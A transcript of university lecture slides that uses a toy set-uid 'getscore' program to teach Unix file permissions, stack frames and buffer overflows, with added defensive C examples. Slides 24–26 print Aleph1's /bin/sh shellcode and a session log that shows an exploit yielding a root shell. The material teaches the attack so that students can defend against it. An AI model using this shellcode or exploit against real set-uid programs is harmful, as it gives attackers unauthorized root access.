Presentation on theme: "Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score."— Presentation transcript:

Slide 1: Let’s look at an example
I want to write an application that reports the course scores to you. Requirements:
–Every student can only get his/her score
–Maintain all students’ scores in a file
–Local command-line operation

Slide 2: Score file format
    [root@localhost getscore]# cat score.txt
    Mary Doe:123-45-6789:A+:…
    Tom Smith:567-89-1234:B:…
Fields, in order: user name, student SSN, score.

Slide 3: Our little “getscore” program
–User name and SSN for authentication
–Score file only readable to user root
–A program reads the score file and reports the grade to an authenticated user
    [root@localhost]# ls -l
    total 24
    -rw------- 1 root root 46 Aug 20 11:35 score.txt
    -rwsr-xr-x 1 root root 12947 Aug 20 11:36 getscore
The “s” in the owner’s execute position of getscore is the setuid bit.

Slide 4: Unix file system protection
Attributes of a file:
    [root@localhost course_scores]# ls -l
    total 20
    -rwsr-xr-x 1 root root 13587 Aug 25 2009 getscore
    -rw------- 1 root root 88 Aug 25 2009 score.txt
The ls -l columns are: permission bits, link count, owner, group, size, date, name. The permission bits are read left to right as:
    position 1: directory bit {d,-}
    positions 2–4: owner permissions {r,-} {w,-} {x,s,-}
    positions 5–7: group permissions {r,-} {w,-} {x,s,-}
    positions 8–10: other user permissions {r,-} {w,-} {x,-}
Legend: d: directory; r: read; w: write; x: execute (for a directory: access it); s: set-uid bit

Slide 5: Unix set-uid mechanism
–A user can execute a program if the program file has the “x” bit set for that user.
–Typically the program’s process will have the invoker’s privilege.
–If the program file also has the set-uid bit set for the owner (an “s” is shown in the owner’s execute position), then the program will also have the program owner’s privilege. We call such programs “set-uid programs”.

Slide 6: Unix set-uid mechanism
Provides a path for privilege elevation
–There are legitimate needs for elevating a process’s privilege to perform its job, e.g. the “passwd” command.
(Simplified version) Two user id fields in a process’s PCB: real user id (ruid) and effective user id (euid)
–It is the euid that matters in OS protection.
–Non-setuid programs have both fields set to the id of the invoker when the program is started.
–Setuid programs have ruid set to the invoker, but euid set to the owner of the executable, when started.
–There are programming interfaces for changing the two uids during the program’s execution, and rules on which changes are allowed.
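The two uid fields from slide 6 as a defender would use them: an added example (not the lecture’s getscore source) that reads ruid and euid, uses the owner’s privilege only to open the root-only score file, and then drops that privilege for good before any argument is looked at. It assumes Linux semantics for setuid(); the file path is a placeholder.

```c
/* Added example, not the lecture's getscore source: observe the two uid
 * fields of slide 6 and give up the owner's privilege for good before the
 * program looks at anything the invoker controls. Assumes Linux setuid(). */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* 1 if the effective uid differs from the real uid, i.e. the process is
 * currently running with the executable owner's privilege, not the invoker's. */
int euid_is_elevated(void) {
    return getuid() != geteuid();
}

/* Drop to the invoker's identity. On Linux, when the caller runs as root
 * (euid 0), setuid() sets the real, effective and saved uid together, so the
 * owner's privilege cannot be regained later. The result is verified instead
 * of trusted. Returns 0 on success, -1 if the drop failed or did not take. */
int drop_privileges(void) {
    uid_t invoker = getuid();
    if (setuid(invoker) != 0)
        return -1;
    return geteuid() == invoker ? 0 : -1;
}

/* The ordering a set-uid getscore should follow: use the owner's privilege
 * only to open the root-only score file, then drop it unconditionally, before
 * a single argument is parsed. Returns the open stream (NULL if the open
 * failed); *dropped reports whether the privilege drop succeeded. */
FILE *open_score_file_then_drop(const char *path, int *dropped) {
    FILE *f = fopen(path, "r");          /* needs root if the file is 0600 root */
    *dropped = (drop_privileges() == 0); /* from here on, invoker's rights only */
    return f;
}

int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "score.txt"; /* placeholder path */
    int dropped = 0;
    printf("before: ruid=%u euid=%u elevated=%d\n",
           (unsigned)getuid(), (unsigned)geteuid(), euid_is_elevated());
    FILE *f = open_score_file_then_drop(path, &dropped);
    printf("after:  ruid=%u euid=%u elevated=%d dropped=%d opened=%d\n",
           (unsigned)getuid(), (unsigned)geteuid(), euid_is_elevated(),
           dropped, f != NULL);
    if (f) fclose(f);
    /* Only now would the name and SSN from argv be parsed and matched. */
    return dropped ? 0 : 1;
}
```

Run as an ordinary user the program is never elevated, so the drop is a no-op that still succeeds; installed set-uid root, the same code leaves all three uid fields at the invoker’s id before argv is touched.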

Slide 7: Getting your score
    [simon@localhost]$ ./getscore "Mary Doe" 123-45-6789
    Your score is A+
    [xou@localhost course_scores]$ ./getscore "Tom Smith" 567-89-1234
    Your score is B
    [root@localhost]$ ./getscore "Mary Doe" 123-45-7890
    Invalid user name or SSN.

Slide 8: Security problems in getscore
First things first: analyze the threat
–Who are the adversaries? What are they after? What are the potential risks and their implications? How would you mitigate the risk?

Slide 9: Let’s try this
    [simon@localhost getscore]$ ./getscore "Mary Doe" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Segmentation fault
There is a vulnerability in the getscore program: a long argument crashes it. The segmentation fault itself is a protection mechanism at work: the OS terminates the process when it touches memory it is not allowed to access.

Slide 10: Linux process memory map
Diagram (low to high addresses): .text, .data, heap (allocated data), unused space, stack. Within the stack, from the top of the stack (ESP) toward the bottom: a called function’s local variables, saved EBP, saved EIP (the function’s return address), the function’s arguments, then main()’s local variables, argc, **argv, **envp, and the environment variables. Addresses grow upward in the diagram; ESP points to the top of the stack and EBP to the base of the current stack frame.

Slides 11–14: Calling a function
    main(){
      :
      function(s)
      :
    }
    function(s){
      :
      return;
    }
Diagram sequence: while main() runs, only main()’s local variables are on the stack above argc, **argv, **envp and the environment variables (ESP at the top of the stack, EBP at main()’s frame). The call then proceeds in steps: push s (the function argument); push the return EIP (saved EIP); push EBP (saved EBP) and allocate a new frame for function()’s local variables, so that ESP and EBP now bracket the new frame.

Slide 15: Stack buffer overflow attack
Diagram: the same layout with function(s) active: its local variables at the top of the stack, then saved EBP, saved EIP, the function argument, and main()’s local variables below.

Slides 16–17: Returning from a function
Diagram sequence: on return, the function’s frame is released and the saved EBP is restored; then control is released to the caller by popping the saved EIP into EIP. A buffer overflow on the stack can change this control flow.

Slides 18–21: Stack overflow attack
Diagram sequence: function(s) allocates its frame (push EBP, allocate a new frame for local variables), and a long run of “A” characters written into a local buffer overflows past the local variables into the saved EBP and saved EIP. When the frame is released, the restored EBP is 0x41414141 (“AAAA”), and the saved EIP that control is released to is 0x41414141 as well. Control hijacked by attacker!

Slide 22: Buffer overflow vulnerability
–The program fails to ensure that a write to a buffer always stays within the buffer’s bounds.
–When a buffer overflow happens, data structures in memory are corrupted, potentially changing the program’s behavior. In many cases it can lead to the execution of arbitrary code by attackers.
–A common problem in memory-unsafe programming languages such as C and C++.
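The fix the slide calls for, as an added example that is not the lecture’s getscore source (the slides never show it): a lookup over the score file format of slide 2 in which invoker input is compared by length and content rather than copied into a fixed stack buffer, and the one remaining copy refuses input that would not fit. The sample records and their trailing field are constructed for the example.

```c
/* Added example, not the lecture's getscore source (never shown on the slides):
 * a bounds-checked lookup over the score file format of slide 2. The crash on
 * slide 9 comes from copying an arbitrary-length argument into a fixed stack
 * buffer; here invoker input is only compared by length and content. */
#include <stdio.h>
#include <string.h>

/* Copy src[0..src_len) plus a NUL into dst[dst_size]; -1 if it would not fit. */
int copy_bounded(char *dst, size_t dst_size, const char *src, size_t src_len) {
    if (src_len >= dst_size) return -1;   /* refuse: no truncation, no overflow */
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return 0;
}

/* Find the record whose first two fields equal name and ssn exactly; copy its
 * third field into score[]. Returns 1 on match, 0 on none, -1 if it won't fit. */
int lookup_score(const char *text, const char *name, const char *ssn,
                 char *score, size_t score_size) {
    size_t nlen = strlen(name), slen = strlen(ssn);
    for (const char *line = text; *line; ) {
        const char *eol = strchr(line, '\n');
        const char *end = eol ? eol : line + strlen(line);
        const char *c1 = memchr(line, ':', (size_t)(end - line));
        /* (length, content) comparison: a 151-byte name matches nothing. */
        if (c1 && (size_t)(c1 - line) == nlen && memcmp(line, name, nlen) == 0) {
            const char *c2 = memchr(c1 + 1, ':', (size_t)(end - c1 - 1));
            if (c2 && (size_t)(c2 - c1 - 1) == slen && memcmp(c1 + 1, ssn, slen) == 0) {
                const char *sc = c2 + 1;
                const char *c3 = memchr(sc, ':', (size_t)(end - sc));
                size_t sclen = (size_t)((c3 ? c3 : end) - sc);
                return copy_bounded(score, score_size, sc, sclen) == 0 ? 1 : -1;
            }
        }
        if (!eol) break;
        line = eol + 1;
    }
    return 0;
}

/* Constructed sample in the slide's format; the trailing field is made up. */
const char SCORE_FILE[] = "Mary Doe:123-45-6789:A+:cs101\n"
                          "Tom Smith:567-89-1234:B:cs101\n";

int main(int argc, char **argv) {
    char score[8];
    if (argc != 3) return 2;
    if (lookup_score(SCORE_FILE, argv[1], argv[2], score, sizeof score) == 1)
        printf("Your score is %s\n", score);
    else printf("Invalid user name or SSN.\n");
    return 0;
}
```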

Slide 23: Setuid and buffer overflow
What is the implication of a buffer overflow in a setuid program?
–If the buffer overflow happens while one of the uid fields still holds more privilege than the invoker, it can result in a local privilege escalation vulnerability, i.e. an attacker who has already obtained local access on the system can escalate their privilege.
–If the setuid program is owned by root, an attacker with an ordinary user account may gain root privilege on the system.

Slide 24: Creating a malicious input
Diagram: layout of the input relative to the original buffer: NOP sled, shell code, then the new EIP value.
Questions:
1. How long should the input be?
2. Where should we put the EIP in the input?
3. What value of EIP should be put in?

Slide 25: Shell code to use
    /* Aleph1's Linux shellcode from "Smashing the stack for fun and profit", Phrack 49, vol 7 */
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Slide 26: Getting a root shell
    [xou@localhost simon]$ ./exploit_gen_with_esp 0xbffff830 160 120
    Length of shell code: 45
    Using sp: 0xbffff830
    Using address: 0xbffff7b8
    NOP sled: 103 bytes
    [xou@localhost simon]$ cd /root/course_scores/
    [xou@localhost course_scores]$ ./getscore aaa $EGG
    sh-2.05b#
    sh-2.05b# whoami
    root
    sh-2.05b#

Slide 27: Summary
–OS protection prevents applications from interfering with each other.
–Protection mechanisms are limited by the possible vulnerabilities in the application and system code.

